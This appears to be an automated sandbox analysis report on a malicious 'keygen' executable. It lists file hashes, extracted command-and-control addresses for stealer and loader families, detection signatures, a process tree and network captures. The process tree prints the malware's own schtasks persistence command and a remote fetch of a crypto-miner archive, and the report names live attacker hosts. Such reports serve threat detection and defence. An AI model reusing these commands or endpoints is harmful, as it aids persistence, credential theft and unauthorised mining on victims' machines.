Analysis

  • max time kernel
    85s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    08/11/2024, 22:25 UTC

General

  • Target

    keygen-step-4.exe

  • Size

    3.4MB

  • MD5

    6fc4f2d665aa1aae0a56ebd4cc6227a7

  • SHA1

    1b998ceba86cd9b87dbbf464fca3008bc5c725ea

  • SHA256

    77acd936a5bd8eb9ae70ca4ac75e5159df48324273baae60854b6fbc412d36d7

  • SHA512

    67048ad418bd35e30671b76951f149e81be58d94e6cbcff4cdc01f19b3bf0ca64103c59451efbf5e519e95a9a126df561ff559f7ee4cc263bfc501e6d0fa5f4e

  • SSDEEP

    98304:SKqyUiTtG/saMpSQwnQXl8LSZ8Z56DXXuDUVJqDI6AHZQTg9:S8usaMpuQXl8LSk5mX4iJBfQs9

Malware Config

Extracted

Family

ffdroider

C2

http://186.2.171.3

Extracted

Family

gcleaner

C2

194.145.227.161

Extracted

Family

privateloader

C2

http://37.0.10.214/proxies.txt

http://37.0.10.244/server.txt

pastebin.com/raw/A7dSG1te

http://wfsdragon.ru/api/setStats.php

31.210.20.251

Signatures

  • Detect Fabookie payload 1 IoCs
  • FFDroider

    Stealer targeting social media platform users first seen in April 2022.

  • FFDroider payload 2 IoCs
  • Fabookie

    Fabookie is facebook account info stealer.

  • Fabookie family
  • Ffdroider family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • Onlylogger family
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • Privateloader family
  • OnlyLogger payload 1 IoCs
  • Executes dropped EXE 14 IoCs
  • Loads dropped DLL 40 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies system certificate store 2 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
    "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:800
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2456
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe" -a
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2080
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2804
      • C:\Users\Admin\AppData\Local\Temp\chrome3.exe
        "C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2504
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2752
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:1328
        • C:\Users\Admin\AppData\Roaming\services64.exe
          "C:\Users\Admin\AppData\Roaming\services64.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2056
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
            5⤵
              PID:592
              • C:\Windows\system32\schtasks.exe
                schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                6⤵
                • Scheduled Task/Job: Scheduled Task
                PID:2828
            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
              5⤵
              • Executes dropped EXE
              PID:1480
        • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
          "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2992
        • C:\Users\Admin\AppData\Local\Temp\2.exe
          "C:\Users\Admin\AppData\Local\Temp\2.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2152
        • C:\Users\Admin\AppData\Local\Temp\setup.exe
          "C:\Users\Admin\AppData\Local\Temp\setup.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:528
        • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
          "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
          3⤵
          • Executes dropped EXE
          PID:2736
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe"
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:3008
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe"
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2032
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 136
          3⤵
          • Loads dropped DLL
          • Program crash
          PID:1504
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2408
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2772

    Network

    • flag-us
      DNS
      live.goatgame.live
      Crack.exe
      Remote address:
      8.8.8.8:53
      Request
      live.goatgame.live
      IN A
      Response
    • flag-ru
      GET
      http://186.2.171.3/seemorebty/il.php?e=md1_1eaf
      md1_1eaf.exe
      Remote address:
      186.2.171.3:80
      Request
      GET /seemorebty/il.php?e=md1_1eaf HTTP/1.1
      Connection: Keep-Alive
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
      Accept-Language: en-US,en;q=0.9
      Referer: https://www.facebook.com
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
      Host: 186.2.171.3
      Response
      HTTP/1.1 301 Moved Permanently
      Server: ddos-guard
      Date: Fri, 08 Nov 2024 22:25:15 GMT
      Connection: keep-alive
      Keep-Alive: timeout=60
      Set-Cookie: __ddg8_=0zMIuHvwk2zo03g9; Domain=.171.3; Path=/; Expires=Fri, 08-Nov-2024 22:45:15 GMT
      Set-Cookie: __ddg9_=138.199.29.44; Domain=.171.3; Path=/; Expires=Fri, 08-Nov-2024 22:45:15 GMT
      Set-Cookie: __ddg10_=1731104715; Domain=.171.3; Path=/; Expires=Fri, 08-Nov-2024 22:45:15 GMT
      Location: https://186.2.171.3/seemorebty/il.php?e=md1_1eaf
      Content-Type: text/html; charset=utf-8
      Content-Length: 568
    • flag-us
      DNS
      cleaner-partners.biz
      setup.exe
      Remote address:
      8.8.8.8:53
      Request
      cleaner-partners.biz
      IN A
      Response
    • flag-us
      DNS
      ip-api.com
      jhuuee.exe
      Remote address:
      8.8.8.8:53
      Request
      ip-api.com
      IN A
      Response
      ip-api.com
      IN A
      208.95.112.1
    • flag-us
      GET
      http://ip-api.com/json/
      jhuuee.exe
      Remote address:
      208.95.112.1:80
      Request
      GET /json/ HTTP/1.1
      Connection: Keep-Alive
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
      Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
      viewport-width: 1920
      Host: ip-api.com
      Response
      HTTP/1.1 200 OK
      Date: Fri, 08 Nov 2024 22:25:17 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 289
      Access-Control-Allow-Origin: *
      X-Ttl: 7
      X-Rl: 36
    • flag-us
      DNS
      qwertys.info
      2.exe
      Remote address:
      8.8.8.8:53
      Request
      qwertys.info
      IN A
      Response
    • flag-us
      DNS
      remotenetwork.xyz
      PublicDwlBrowser188.exe
      Remote address:
      8.8.8.8:53
      Request
      remotenetwork.xyz
      IN A
      Response
    • flag-us
      DNS
      startupmart.bar
      PublicDwlBrowser188.exe
      Remote address:
      8.8.8.8:53
      Request
      startupmart.bar
      IN A
      Response
    • flag-us
      DNS
      best-supply-link.xyz
      PublicDwlBrowser188.exe
      Remote address:
      8.8.8.8:53
      Request
      best-supply-link.xyz
      IN A
      Response
    • flag-us
      DNS
      2no.co
      ss.exe
      Remote address:
      8.8.8.8:53
      Request
      2no.co
      IN A
      Response
      2no.co
      IN A
      104.21.79.229
      2no.co
      IN A
      172.67.149.76
    • flag-us
      GET
      https://2no.co/1aYEa7
      PublicDwlBrowser188.exe
      Remote address:
      104.21.79.229:443
      Request
      GET /1aYEa7 HTTP/1.1
      User-Agent: tu9/7
      Host: 2no.co
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Fri, 08 Nov 2024 22:25:32 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      memory: 0.35860443115234375
      expires: Fri, 08 Nov 2024 22:25:32 +0000
      strict-transport-security: max-age=604800
      strict-transport-security: max-age=31536000
      content-security-policy: img-src https: data:; upgrade-insecure-requests
      x-frame-options: SAMEORIGIN
      cf-cache-status: DYNAMIC
      vary: accept-encoding
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kCgQQC64IEW76pbktf9UXuqVcIe9ruOzB6fGbceg8E16F0WsuaxvxCbAHHRx7C%2BUQ0eIU2FqbQ3YdGkogeayPsbP7jglvD1h5NKO2ABI%2B49kbHlsb11ZlHE%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8df8fac44e2771f2-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=69128&sent=6&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=361&delivery_rate=65183&cwnd=253&unsent_bytes=0&cid=68f7131777c46122&ts=430&x=0"
    • flag-us
      DNS
      one-online-gam3s.com
      ss.exe
      Remote address:
      8.8.8.8:53
      Request
      one-online-gam3s.com
      IN A
      Response
    • flag-us
      DNS
      oneeuropegroup.xyz
      ss.exe
      Remote address:
      8.8.8.8:53
      Request
      oneeuropegroup.xyz
      IN A
      Response
    • flag-us
      DNS
      gensolutions.bar
      ss.exe
      Remote address:
      8.8.8.8:53
      Request
      gensolutions.bar
      IN A
      Response
    • flag-us
      GET
      https://2no.co/1rJas7
      ss.exe
      Remote address:
      104.21.79.229:443
      Request
      GET /1rJas7 HTTP/1.1
      Host: 2no.co
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Fri, 08 Nov 2024 22:25:49 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      memory: 0.42510986328125
      expires: Fri, 08 Nov 2024 22:25:49 +0000
      strict-transport-security: max-age=604800
      strict-transport-security: max-age=31536000
      content-security-policy: img-src https: data:; upgrade-insecure-requests
      x-frame-options: SAMEORIGIN
      cf-cache-status: DYNAMIC
      vary: accept-encoding
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B6VvKJd52FTr8I5dSczAjK%2FPUJeKt8OaTvznYtSc%2FewEeZY1zkd9jVqzHpy2JwO4N2GBZe%2Bc2nyKHQAJY8X4xozChLm2ii5LB7CDxByofwAiGUyZW%2FkQ%2Fn4%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8df8fb2deec97711-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=46691&sent=6&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=345&delivery_rate=89594&cwnd=253&unsent_bytes=0&cid=19f5996760e534d2&ts=245&x=0"
    • flag-us
      DNS
      sanctam.net
      services64.exe
      Remote address:
      8.8.8.8:53
      Request
      sanctam.net
      IN A
      Response
    • flag-us
      DNS
      github.com
      services64.exe
      Remote address:
      8.8.8.8:53
      Request
      github.com
      IN A
      Response
      github.com
      IN A
      20.26.156.215
    • flag-gb
      GET
      https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip
      services64.exe
      Remote address:
      20.26.156.215:443
      Request
      GET /UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip HTTP/1.1
      Host: github.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 302 Found
      Server: GitHub.com
      Date: Fri, 08 Nov 2024 22:26:19 GMT
      Content-Type: text/html; charset=utf-8
      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
      Access-Control-Allow-Origin:
      Location: https://raw.githubusercontent.com/UnamSanctam/SilentXMRMiner/master/SilentXMRMiner/Resources/xmrig.zip
      Cache-Control: no-cache
      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
      X-Frame-Options: deny
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 0
      Referrer-Policy: no-referrer-when-downgrade
      Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
      Content-Length: 0
      X-GitHub-Request-Id: C102:172BE1:108219B:122E17D:672E900D
    • flag-us
      DNS
      raw.githubusercontent.com
      services64.exe
      Remote address:
      8.8.8.8:53
      Request
      raw.githubusercontent.com
      IN A
      Response
      raw.githubusercontent.com
      IN A
      185.199.110.133
      raw.githubusercontent.com
      IN A
      185.199.109.133
      raw.githubusercontent.com
      IN A
      185.199.108.133
      raw.githubusercontent.com
      IN A
      185.199.111.133
    • flag-us
      DNS
      pastebin.com
      Setup.exe
      Remote address:
      8.8.8.8:53
      Request
      pastebin.com
      IN A
      Response
      pastebin.com
      IN A
      104.20.3.235
      pastebin.com
      IN A
      104.20.4.235
      pastebin.com
      IN A
      172.67.19.24
    • flag-us
      GET
      https://pastebin.com/raw/A7dSG1te
      Setup.exe
      Remote address:
      104.20.3.235:443
      Request
      GET /raw/A7dSG1te HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
      Host: pastebin.com
      Response
      HTTP/1.1 404 Not Found
      Date: Fri, 08 Nov 2024 22:26:32 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      x-frame-options: DENY
      x-frame-options: DENY
      x-content-type-options: nosniff
      x-content-type-options: nosniff
      x-xss-protection: 1;mode=block
      x-xss-protection: 1;mode=block
      cache-control: public, max-age=1801
      CF-Cache-Status: HIT
      Age: 1141
      Server: cloudflare
      CF-RAY: 8df8fc39daa8956c-LHR
    • flag-us
      DNS
      wfsdragon.ru
      Setup.exe
      Remote address:
      8.8.8.8:53
      Request
      wfsdragon.ru
      IN A
      Response
      wfsdragon.ru
      IN A
      104.21.5.208
      wfsdragon.ru
      IN A
      172.67.133.215
    • flag-us
      GET
      http://wfsdragon.ru/api/setStats.php
      Setup.exe
      Remote address:
      104.21.5.208:80
      Request
      GET /api/setStats.php HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
      Host: wfsdragon.ru
      Response
      HTTP/1.1 404 Not Found
      Date: Fri, 08 Nov 2024 22:26:32 GMT
      Content-Type: text/html; charset=iso-8859-1
      Transfer-Encoding: chunked
      Connection: keep-alive
      cf-cache-status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kGGoIlgRGcpta4qUMNkJRDNezTyADVbbioZG9gkVZOx8AvxHlndWtXBb8ibhVQZrgkrPALCTCFPFTVt0WhC07ajqZV1I%2FlFshmCbwwPXhUd%2F69%2FEy7F4nj2kJNSzlL8%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8df8fc3af98e948f-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=40884&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=207&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
    • 186.2.171.3:80
      http://186.2.171.3/seemorebty/il.php?e=md1_1eaf
      http
      md1_1eaf.exe
      648 B
      2.4kB
      5
      4

      HTTP Request

      GET http://186.2.171.3/seemorebty/il.php?e=md1_1eaf

      HTTP Response

      301
    • 186.2.171.3:443
      tls
      md1_1eaf.exe
      1.1kB
      3.3kB
      10
      8
    • 194.145.227.161:80
      setup.exe
      152 B
      3
    • 208.95.112.1:80
      http://ip-api.com/json/
      http
      jhuuee.exe
      728 B
      557 B
      5
      2

      HTTP Request

      GET http://ip-api.com/json/

      HTTP Response

      200
    • 104.21.79.229:443
      https://2no.co/1aYEa7
      tls, http
      PublicDwlBrowser188.exe
      901 B
      12.2kB
      12
      17

      HTTP Request

      GET https://2no.co/1aYEa7

      HTTP Response

      200
    • 104.21.79.229:443
      2no.co
      tls
      PublicDwlBrowser188.exe
      931 B
      12.3kB
      13
      20
    • 194.145.227.161:80
      setup.exe
      152 B
      3
    • 104.21.79.229:443
      https://2no.co/1rJas7
      tls, http
      ss.exe
      931 B
      12.3kB
      13
      19

      HTTP Request

      GET https://2no.co/1rJas7

      HTTP Response

      200
    • 37.0.10.214:80
      Setup.exe
      152 B
      3
    • 194.145.227.161:80
      setup.exe
      152 B
      3
    • 37.0.10.244:80
      Setup.exe
      152 B
      3
    • 194.145.227.161:80
      setup.exe
      152 B
      3
    • 20.26.156.215:443
      https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip
      tls, http
      services64.exe
      887 B
      7.8kB
      10
      8

      HTTP Request

      GET https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip

      HTTP Response

      302
    • 185.199.110.133:443
      raw.githubusercontent.com
      tls
      services64.exe
      793 B
      4.2kB
      10
      11
    • 104.20.3.235:443
      https://pastebin.com/raw/A7dSG1te
      tls, http
      Setup.exe
      881 B
      6.1kB
      9
      9

      HTTP Request

      GET https://pastebin.com/raw/A7dSG1te

      HTTP Response

      404
    • 104.21.5.208:80
      http://wfsdragon.ru/api/setStats.php
      http
      Setup.exe
      483 B
      2.1kB
      6
      5

      HTTP Request

      GET http://wfsdragon.ru/api/setStats.php

      HTTP Response

      404
    • 31.210.20.251:80
      Setup.exe
      152 B
      3
    • 194.145.227.161:80
      152 B
      3
    • 194.145.227.161:80
      152 B
      3
    • 194.145.227.161:80
      152 B
      3
    • 8.8.8.8:53
      live.goatgame.live
      dns
      Crack.exe
      64 B
      126 B
      1
      1

      DNS Request

      live.goatgame.live

    • 8.8.8.8:53
      cleaner-partners.biz
      dns
      setup.exe
      66 B
      128 B
      1
      1

      DNS Request

      cleaner-partners.biz

    • 8.8.8.8:53
      ip-api.com
      dns
      jhuuee.exe
      56 B
      72 B
      1
      1

      DNS Request

      ip-api.com

      DNS Response

      208.95.112.1

    • 8.8.8.8:53
      qwertys.info
      dns
      2.exe
      58 B
      137 B
      1
      1

      DNS Request

      qwertys.info

    • 8.8.8.8:53
      remotenetwork.xyz
      dns
      PublicDwlBrowser188.exe
      63 B
      128 B
      1
      1

      DNS Request

      remotenetwork.xyz

    • 8.8.8.8:53
      startupmart.bar
      dns
      PublicDwlBrowser188.exe
      61 B
      126 B
      1
      1

      DNS Request

      startupmart.bar

    • 8.8.8.8:53
      best-supply-link.xyz
      dns
      PublicDwlBrowser188.exe
      66 B
      131 B
      1
      1

      DNS Request

      best-supply-link.xyz

    • 8.8.8.8:53
      2no.co
      dns
      ss.exe
      52 B
      84 B
      1
      1

      DNS Request

      2no.co

      DNS Response

      104.21.79.229
      172.67.149.76

    • 8.8.8.8:53
      one-online-gam3s.com
      dns
      ss.exe
      66 B
      139 B
      1
      1

      DNS Request

      one-online-gam3s.com

    • 8.8.8.8:53
      oneeuropegroup.xyz
      dns
      ss.exe
      64 B
      129 B
      1
      1

      DNS Request

      oneeuropegroup.xyz

    • 8.8.8.8:53
      gensolutions.bar
      dns
      ss.exe
      62 B
      127 B
      1
      1

      DNS Request

      gensolutions.bar

    • 8.8.8.8:53
      sanctam.net
      dns
      services64.exe
      57 B
      130 B
      1
      1

      DNS Request

      sanctam.net

    • 8.8.8.8:53
      github.com
      dns
      services64.exe
      56 B
      72 B
      1
      1

      DNS Request

      github.com

      DNS Response

      20.26.156.215

    • 8.8.8.8:53
      raw.githubusercontent.com
      dns
      services64.exe
      71 B
      135 B
      1
      1

      DNS Request

      raw.githubusercontent.com

      DNS Response

      185.199.110.133
      185.199.109.133
      185.199.108.133
      185.199.111.133

    • 8.8.8.8:53
      pastebin.com
      dns
      Setup.exe
      58 B
      106 B
      1
      1

      DNS Request

      pastebin.com

      DNS Response

      104.20.3.235
      104.20.4.235
      172.67.19.24

    • 8.8.8.8:53
      wfsdragon.ru
      dns
      Setup.exe
      58 B
      90 B
      1
      1

      DNS Request

      wfsdragon.ru

      DNS Response

      104.21.5.208
      172.67.133.215

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      aa1ae69f33f753697474e8076e7477cb

      SHA1

      355bda4e65533627397e5dc3ae1a95260c2eb0be

      SHA256

      e7117af0feb90088913065fd4173a4424bae3faca9ab339094660192f14f46d7

      SHA512

      ceafdd223859eabe215f2d773ac0305265151a66d267514476d7cef07b6e0002e48c76360e40bb2339648bc2cb263fa24aa2e70bbaa87ba62dbeff7841049fbb

    • C:\Users\Admin\AppData\Local\Temp\2.exe

      Filesize

      8KB

      MD5

      a5bace3c3c2fa1cb766775746a046594

      SHA1

      9998cad5ba39e0be94347fcd2a2affd0c0a25930

      SHA256

      617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6

      SHA512

      66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184

    • C:\Users\Admin\AppData\Local\Temp\Cab58EB.tmp

      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

      Filesize

      101KB

      MD5

      13e802bd360e44591d7d23036ce1fd33

      SHA1

      091a58503734848a4716382862526859299ef345

      SHA256

      e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b

      SHA512

      8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b

    • C:\Users\Admin\AppData\Local\Temp\Tar5ACE.tmp

      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    • C:\Users\Admin\AppData\Local\Temp\chrome3.exe

      Filesize

      43KB

      MD5

      4b0d49f7c8712d7a0d44306309f2e962

      SHA1

      5f0a2536f215babccf860c7ccdeaf7055bb59cad

      SHA256

      f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60

